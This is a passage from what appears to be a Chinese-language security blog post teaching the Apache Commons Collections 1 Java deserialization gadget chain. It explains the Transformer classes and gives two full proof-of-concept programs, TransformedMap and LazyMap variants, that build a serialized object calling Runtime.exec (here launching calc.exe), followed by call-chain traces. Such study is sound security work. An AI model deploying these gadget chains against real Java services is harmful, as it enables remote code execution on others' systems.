<li><p>TransformedMap 用于对Java标准数据结构Map做装饰器，它将一个 Map 包装起来，decorate（）方法对map中的键值对进行修改，第一个参数为要修饰的Map类，第二个参数和第三个参数作为一个实现Transformer接口的类，用来转换修饰的Map的键、值（为null时不进行转换）。在利用链中，TransformedMap 可以用于在反序列化时触发特定的转换逻辑。</p>
</li>
</ul>
<p><strong>LazyMap</strong></p>
<ul>
<li>LazyMap 是一个 Map 的惰性实现，它使用 Transformer 来惰性地计算缺失的键的值。在利用链中，LazyMap 可以用于延迟计算，直到实际需要某个键的值时才进行。</li>
</ul>
<p><strong>ConstantTransformer</strong></p>
<ul>
<li>ConstantTransformer 是 Transformer 接口的一个实现，它总是返回一个指定的常量值，不管输入是什么。在利用链中，它可以用于提供一致的返回值，从而控制执行流程。</li>
</ul>
<p><strong>InvokerTransformer</strong></p>
<ul>
<li><p>InvokerTransformer 是 Transformer 接口的一个实现，它允许调用对象的某个方法。在利用链中，它可以用来调用类的方法，如 Runtime.exec()，来执行任意命令、String.toUpperCase()来反转字符。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]&#123;String.class&#125;, new Object[]&#123;"c:\\windows\\system32\\calc.exe"&#125;);</span><br><span class="line">invokerTransformer.transform(Runtime.getRuntime());</span><br></pre></td></tr></table></figure>
<p>**ChainedTransformer  **</p>
</li>
<li><p>ChainedTransformer 是 Apache Commons Collections 库中的一个类，它允许您将多个 Transformer 对象链接或组合在一起，以便对一个对象进行一系列转换。当您有一个对象并且想要对它应用多个转换逻辑时，ChainedTransformer 非常有用。</p>
</li>
<li><p>在 Commons Collections 反序列化漏洞利用链中，ChainedTransformer 可以用来串联多个转换操作，这在构造复杂的利用链时特别有用。通过 ChainedTransformer，攻击者可以创建一个复杂的 gadgets 链，每个 gadgets 负责执行利用链中的一个步骤。</p>
</li>
</ul>
<p><strong>sun.reflect.annotation.AnnotationInvocationHandler：</strong></p>
<ul>
<li>Java 内部类，用于处理注解的方法调用。在代码中，它被用来创建一个自定义的 InvocationHandler，该处理程序在反序列化时触发 Transformer 链。</li>
</ul>
<p>下图来源自P神文章：<br /><img src="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/8.png" class=""></p>
<p><a name="FMtyY"></a></p>
<h4 id="学习demo"><a href="#学习demo" class="headerlink" title="学习demo"></a>学习demo</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonCollections1</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        <span class="comment">// 创建一个原始的 HashMap</span></span><br><span class="line">        Map&lt;String, String&gt; baseMap = <span class="keyword">new</span> HashMap&lt;String, String&gt;();</span><br><span class="line">        baseMap.put(<span class="string">"k1"</span>, <span class="string">"value1"</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//用于反射对象，String.toUpperCase();</span></span><br><span class="line">        Transformer toUpperCasevalueTransformer = <span class="keyword">new</span> InvokerTransformer(</span><br><span class="line">                <span class="string">"toUpperCase"</span>, <span class="comment">// 方法名</span></span><br><span class="line">                <span class="keyword">new</span> Class[] &#123;&#125;, <span class="comment">// toUpperCase 方法不接受参数，所以参数类型列表为空</span></span><br><span class="line">                <span class="keyword">new</span> Object[] &#123;&#125;  <span class="comment">// 实际参数列表也为空</span></span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 使用 valueTransformer 包装原始的 HashMap</span></span><br><span class="line">        Map&lt;String, String&gt; transformedMap = TransformedMap.decorate(</span><br><span class="line">                baseMap,</span><br><span class="line">                <span class="keyword">null</span>, <span class="comment">// 键不进行转换</span></span><br><span class="line">                toUpperCasevalueTransformer <span class="comment">// 值进行反转转换</span></span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 添加新的键值对前，先转换值</span></span><br><span class="line">        String originalValue = <span class="string">"value2"</span>;</span><br><span class="line">        Object transformedValue = toUpperCasevalueTransformer.transform(originalValue);</span><br><span class="line">        <span class="comment">// 确保转换后的值是 String 类型</span></span><br><span class="line">        transformedMap.put(<span class="string">"key2"</span>, (String) transformedValue);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 演示转换效果</span></span><br><span class="line">        System.out.println(<span class="string">"原始 Map: "</span> + baseMap);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><a name="z2z6B"></a></p>
<h3 id="TransformedMap-poc"><a href="#TransformedMap-poc" class="headerlink" title="TransformedMap-poc"></a>TransformedMap-poc</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonCollections1</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> Transformer[] &#123;</span><br><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime<span class="class">.<span class="keyword">class</span>),</span></span><br><span class="line">                new InvokerTransformer("getMethod", new Class[] &#123;String.class, Class[].class &#125;, new Object[] &#123; "getRuntime", new Class[0] &#125;),</span><br><span class="line">                new InvokerTransformer("invoke", new Class[] &#123;Object.class, Object[].class &#125;, new Object[] &#123; null, new Object[0] &#125;),</span><br><span class="line">                new InvokerTransformer("exec", new Class[] &#123; String.class&#125;, new String[] &#123;"c:\\windows\\system32\\calc.exe" &#125;),&#125;;</span><br><span class="line">        Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">        <span class="comment">//将多个 Transformer 对象串联起来，形成一个完整的调用链。</span></span><br><span class="line">        <span class="comment">//InvokerTransformer，执⾏Runtime对象的exec⽅法，参数为"c:\\windows\\system32\\calc.exe"</span></span><br><span class="line">        Map innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line">        innerMap.put(<span class="string">"value"</span>, <span class="string">"xxxx"</span>);</span><br><span class="line">        <span class="comment">//利用TransformedMap.decorate()方法来将ChainedTransformer设置为map装饰器的处理方法</span></span><br><span class="line">        <span class="comment">//调用TransformedMap的put()/setValue()等方法时会触发Transformer链的调用方法。</span></span><br><span class="line">        Map outerMap = TransformedMap.decorate(innerMap, <span class="keyword">null</span>, transformerChain); <span class="comment">//串联多个Transformer</span></span><br><span class="line">        <span class="comment">//一个 Map 装饰器，其值的访问会触发 ChainedTransformer。</span></span><br><span class="line">        Class clazz = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line">        <span class="comment">//AnnotationInvocationHandler：一个动态代理，用于处理注解的方法调用，在反序列化时触发 Transformer 链。</span></span><br><span class="line">        Constructor construct = clazz.getDeclaredConstructor(Class<span class="class">.<span class="keyword">class</span>, <span class="title">Map</span>.<span class="title">class</span>)</span>;</span><br><span class="line">        construct.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention<span class="class">.<span class="keyword">class</span>, <span class="title">outerMap</span>)</span>;       <span class="comment">//注解类</span></span><br><span class="line">        </span><br><span class="line">        ByteArrayOutputStream barr = <span class="keyword">new</span> ByteArrayOutputStream();</span><br><span class="line">        ObjectOutputStream  oos = <span class="keyword">new</span> ObjectOutputStream(barr);</span><br><span class="line">        oos.writeObject(handler);<span class="comment">//序列化</span></span><br><span class="line">        oos.close();</span><br><span class="line"></span><br><span class="line">        ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> ByteArrayInputStream(barr.toByteArray()));</span><br><span class="line">        Object o = (Object)ois.readObject();<span class="comment">//反序列化</span></span><br><span class="line">        <span class="comment">//AnnotationInvocationHandler 的反序列化过程触发 TransformedMap 的值访问，进而触发 ChainedTransformer。</span></span><br><span class="line">        <span class="comment">//通过 Transformer 链最终调用 Runtime.exec 方法，执行攻击者指定的命令</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><a name="s1CWN"></a></p>
<h4 id="Gadget-1"><a href="#Gadget-1" class="headerlink" title="Gadget"></a>Gadget</h4><ol>
<li><strong>构造恶意对象</strong>：攻击者创建一个包含恶意代码的集合对象，比如一个 Map。</li>
<li><strong>利用 Transformer</strong>：通过 Commons Collections 中的 Transformer 类，攻击者可以定义一个转换逻辑，这个逻辑在反序列化时执行。</li>
<li><strong>利用 AnnotationInvocationHandler</strong>：AnnotationInvocationHandler 是 Java 中的一个私有类，它可以被用来调用任何方法。通过构造特定的 Transformer，攻击者可以触发 AnnotationInvocationHandler 的构造函数。</li>
<li><strong>执行 Runtime.exec</strong>：通过 AnnotationInvocationHandler，攻击者可以调用 Runtime 类的 exec 方法，从而执行任意命令。</li>
</ol>
<p>核心逻辑就是memberValues.entrySet()和memberValue.setValue()。<br />memberValues就是反序列化后得到的Map，也是经过了TransformedMap修饰的对象，这⾥遍历了它的所有元素，并依次设置值。在调用setValue设置值的时候就会触发TransformedMap⾥注册的 Transform，进而执行我们为其精心设计的任意代码。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">AnnotationInvocationHandler.readObject()</span><br><span class="line">  -&gt; <span class="built_in">Map</span>.entrySet()/setValue()</span><br><span class="line">    -&gt; TransformedMap.setValue()</span><br><span class="line">      -&gt; ChainedTransformer.transform()</span><br><span class="line">        -&gt; ConstantTransformer.transform()</span><br><span class="line">          -&gt; InvokerTransformer.transform()</span><br></pre></td></tr></table></figure>
<p><a name="jOMiC"></a></p>
<h3 id="LazyMap-poc"><a href="#LazyMap-poc" class="headerlink" title="LazyMap-poc"></a>LazyMap-poc</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.LazyMap;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Proxy;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonCollections1</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> Transformer[] &#123;</span><br><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime<span class="class">.<span class="keyword">class</span>),</span></span><br><span class="line">                new InvokerTransformer("getMethod", new Class[] &#123;String.class, Class[].class &#125;, new Object[] &#123; "getRuntime", new Class[0] &#125;),</span><br><span class="line">                new InvokerTransformer("invoke", new Class[] &#123;Object.class, Object[].class &#125;, new Object[] &#123; null, new Object[0] &#125;),</span><br><span class="line">                new InvokerTransformer("exec", new Class[] &#123; String.class&#125;, new String[] &#123;"c:\\windows\\system32\\calc.exe" &#125;),&#125;;</span><br><span class="line">        Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">        <span class="comment">//将多个 Transformer 对象串联起来，形成一个完整的调用链。</span></span><br><span class="line">        <span class="comment">//InvokerTransformer，执⾏Runtime对象的exec⽅法，参数为"c:\\windows\\system32\\calc.exe"</span></span><br><span class="line">        Map innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line">        Map outerMap = LazyMap.decorate(innerMap, transformerChain);<span class="comment">//串联多个Transformer</span></span><br><span class="line">        <span class="comment">//利用TransformedMap.decorate()方法来将ChainedTransformer设置为map装饰器的处理方法</span></span><br><span class="line">        <span class="comment">//惰性地将 ChainedTransformer 应用到 Map 上。</span></span><br><span class="line">        <span class="comment">// 使用了 LazyMap 来装饰内部 HashMap。LazyMap 与 TransformedMap 类似，但它在访问不存在的键时才会应用转换逻辑，这被称为惰性转换。</span></span><br><span class="line"></span><br><span class="line">        Class clazz = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line">        <span class="comment">//AnnotationInvocationHandler：一个动态代理，用于处理注解的方法调用，在反序列化时触发 Transformer 链。</span></span><br><span class="line">        Constructor construct = clazz.getDeclaredConstructor(Class<span class="class">.<span class="keyword">class</span>, <span class="title">Map</span>.<span class="title">class</span>)</span>;</span><br><span class="line">        construct.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention<span class="class">.<span class="keyword">class</span>, <span class="title">outerMap</span>)</span>;       <span class="comment">//注解类</span></span><br><span class="line"></span><br><span class="line">        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] &#123;Map.class&#125;, handler);</span><br><span class="line">        handler = (InvocationHandler) construct.newInstance(Retention<span class="class">.<span class="keyword">class</span>, <span class="title">proxyMap</span>)</span>;</span><br><span class="line">        <span class="comment">//通过 Proxy.newProxyInstance 创建了一个 Map 的动态代理，并将 LazyMap 作为其背后的实际 Map 实例传递给 AnnotationInvocationHandler。</span></span><br><span class="line"></span><br><span class="line">        ByteArrayOutputStream barr = <span class="keyword">new</span> ByteArrayOutputStream();</span><br><span class="line">        ObjectOutputStream  oos = <span class="keyword">new</span> ObjectOutputStream(barr);</span><br><span class="line">        oos.writeObject(handler);<span class="comment">//序列化</span></span><br><span class="line">        oos.close();</span><br><span class="line"></span><br><span class="line">        ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> ByteArrayInputStream(barr.toByteArray()));</span><br><span class="line">        Object o = (Object)ois.readObject();</span><br><span class="line">        <span class="comment">//反序列化</span></span><br><span class="line">        <span class="comment">//AnnotationInvocationHandler 的反序列化过程触发 TransformedMap 的值访问，进而触发 ChainedTransformer。</span></span><br><span class="line">        <span class="comment">//通过 Transformer 链最终调用 Runtime.exec 方法，执行攻击者指定的命令</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol>
<li><strong>创建 Transformer 链</strong>：<ul>
<li>代码首先定义了一系列的 Transformer 对象，这些对象可以按顺序执行特定的操作。它们被用来获取 Runtime 类的实例，并调用它的 exec 方法来执行一个命令（在这个例子中是打开计算器程序）。</li>
</ul>
</li>
<li><strong>构建 LazyMap</strong>：<ul>
<li>然后，代码使用 LazyMap 来装饰一个 HashMap。LazyMap 是一种特殊的 Map，它允许你定义一个转换器（在这里是上面创建的 Transformer 链），这个转换器会在你访问 Map 中的值时被调用。</li>
</ul>
</li>
<li><strong>创建动态代理</strong>：<ul>
<li>接下来，代码使用 Java 的动态代理功能来创建 Map 的一个代理。这个代理背后的实际逻辑是由 AnnotationInvocationHandler 来处理的，它将 LazyMap 作为参数。</li>
</ul>
</li>
<li><strong>序列化和反序列化</strong>：<ul>
<li>代码将动态代理序列化到一个字节流中，然后再次反序列化。这个过程触发了 AnnotationInvocationHandler 的构造函数，它需要一个 Map 作为参数。由于 LazyMap 被用作这个 Map，因此在反序列化时，它会被激活。</li>
</ul>
</li>
<li><strong>触发漏洞</strong>：<ul>
<li>当 LazyMap 被激活时，它会尝试应用定义的 Transformer 链。由于这个链最终调用了 Runtime.exec 方法，这导致了任意代码的执行。<br><a name="yFnXy"></a></li>
</ul>
</li>
</ol>
<h4 id="Gadget-2"><a href="#Gadget-2" class="headerlink" title="Gadget"></a>Gadget</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">AnnotationInvocationHandler.readObject()</span><br><span class="line">  -&gt; <span class="built_in">Map</span>(<span class="built_in">Proxy</span>).entrySet()</span><br><span class="line">    -&gt; AnnotationInvocationHandler.invoke()</span><br><span class="line">      -&gt; LazyMap.get()</span><br><span class="line">        -&gt; ChainedTransformer.transform()</span><br><span class="line">          -&gt; ConstantTransformer.transform() </span><br><span class="line">            -&gt; InvokerTransformer.transform()</span><br></pre></td></tr></table></figure>
<p><a name="rPLGK"></a></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://www.cnblogs.com/N0r4h/p/15840776.html" target="_blank" rel="noopener">URLDNS链分析 - N0r4h - 博客园</a><br /><a href="https://www.cnblogs.com/1vxyz/p/17231164.html" target="_blank" rel="noopener">Java反序列化初探+URLDNS链 - 1vxyz - 博客园</a><br /><a href="https://www.anquanke.com/post/id/261724#h2-11" target="_blank" rel="noopener">URLDNS链&amp;CommonsCollections链详细分析-安全客 - 安全资讯平台</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Java/" rel="tag"># Java</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%B0%84%E7%AF%87/" rel="prev" title="Java安全-反射篇">
      <i class="fa fa-chevron-left"></i> Java安全-反射篇
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/12/19/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-mcms%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="next" title="代码审计-mcms文件上传">
      代码审计-mcms文件上传 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="comments"></div>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#反序列化是什么"><span class="nav-number">1.</span> <span class="nav-text">反序列化是什么</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#说人话"><span class="nav-number">1.0.1.</span> <span class="nav-text">说人话</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1、URLDNS链学习"><span class="nav-number">2.</span> <span class="nav-text">1、URLDNS链学习</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#简介：什么是URLDNS"><span class="nav-number">2.1.</span> <span class="nav-text">简介：什么是URLDNS?</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#URLDNS链分析"><span class="nav-number">2.2.</span> <span class="nav-text">URLDNS链分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Gadget"><span class="nav-number">2.2.1.</span> <span class="nav-text">Gadget</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#代码"><span class="nav-number">2.2.2.</span> <span class="nav-text">代码</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#测试URLDNS链"><span class="nav-number">2.3.</span> <span class="nav-text">测试URLDNS链</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#代码-1"><span class="nav-number">2.3.1.</span> <span class="nav-text">代码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、CommonsCollections1链"><span class="nav-number">3.</span> <span class="nav-text">2、CommonsCollections1链</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#什么是CommonsCollections链"><span class="nav-number">3.1.</span> <span class="nav-text">什么是CommonsCollections链</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基础知识学习"><span class="nav-number">3.2.</span> <span class="nav-text">基础知识学习</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#学习demo"><span class="nav-number">3.2.1.</span> <span class="nav-text">学习demo</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#TransformedMap-poc"><span class="nav-number">3.3.</span> <span class="nav-text">TransformedMap-poc</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Gadget-1"><span class="nav-number">3.3.1.</span> <span class="nav-text">Gadget</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#LazyMap-poc"><span class="nav-number">3.4.</span> <span class="nav-text">LazyMap-poc</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Gadget-2"><span class="nav-number">3.4.1.</span> <span class="nav-text">Gadget</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">4.</span> <span class="nav-text">参考</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ChenZIDu"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">ChenZIDu</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">98</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">60</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">26</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/chenzidu" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;chenzidu" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:oinsm@outlook.com" title="E-Mail → mailto:oinsm@outlook.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/ChenZIDu1" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;ChenZIDu1" rel="noopener" target="_blank"><i class="fa fa-fw fa-twitter"></i>Twitter</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.loongten.com/" title="https:&#x2F;&#x2F;www.loongten.com&#x2F;" rel="noopener" target="_blank">Keac's</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://hsnico.github.io/" title="https:&#x2F;&#x2F;hsnico.github.io" rel="noopener" target="_blank">Hsnico'blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.suk1.top/" title="https:&#x2F;&#x2F;www.suk1.top&#x2F;" rel="noopener" target="_blank">晓黑</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blog.dreams-wj.top/" title="https:&#x2F;&#x2F;blog.dreams-wj.top" rel="noopener" target="_blank">HKer_YM</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blog.ncsec.cn/" title="https:&#x2F;&#x2F;blog.ncsec.cn&#x2F;" rel="noopener" target="_blank">RoarNya</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 2018 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
